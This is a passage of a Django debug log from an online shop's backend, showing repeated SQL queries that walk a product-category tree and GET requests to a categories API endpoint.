"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:10:31,508 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:10:31,510 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:10:31,513 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:10:31,516 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:10:31,519 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:10:31,522 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:10:31,525 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:10:31,528 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:10:31,531 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:10:31,534 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:10:31] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:10:36,893 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:10:36,900 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:10:36,903 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:10:36,905 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:10:36,908 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:10:36,911 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:10:36,913 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:10:36,915 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:10:36,917 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:10:36,920 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:10:36,922 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:10:36,925 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:10:36,930 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:10:36,932 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:10:36,936 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-13 14:10:36,939 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:10:36,942 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:10:36,945 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:10:36,948 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) [13/Dec/2019 14:10:36] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-13 14:10:36,950 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:10:36,953 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:10:36,957 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:10:36,959 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:10:36,961 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:10:36,964 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:10:36,966 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:10:36,968 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:10:36,971 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:10:36,973 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:10:36,975 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:10:36,978 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:10:36,980 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:10:36,984 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:10:36,986 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:10:36,988 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:10:36,990 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:10:36,993 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:10:36,997 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:10:36,999 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:10:37,001 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:10:37,004 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:10:37,006 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:10:37,009 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:10:37,012 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:10:37,014 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:10:37,016 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:10:37,019 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:10:37,022 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:10:37] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:10:44,726 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:10:44,733 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:10:44,736 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:10:44,740 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:10:44,747 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:10:44,752 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:10:44,758 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:10:44,768 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:10:44,772 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:10:44,778 utils 20136 140506667599616 (0.006) SELECT 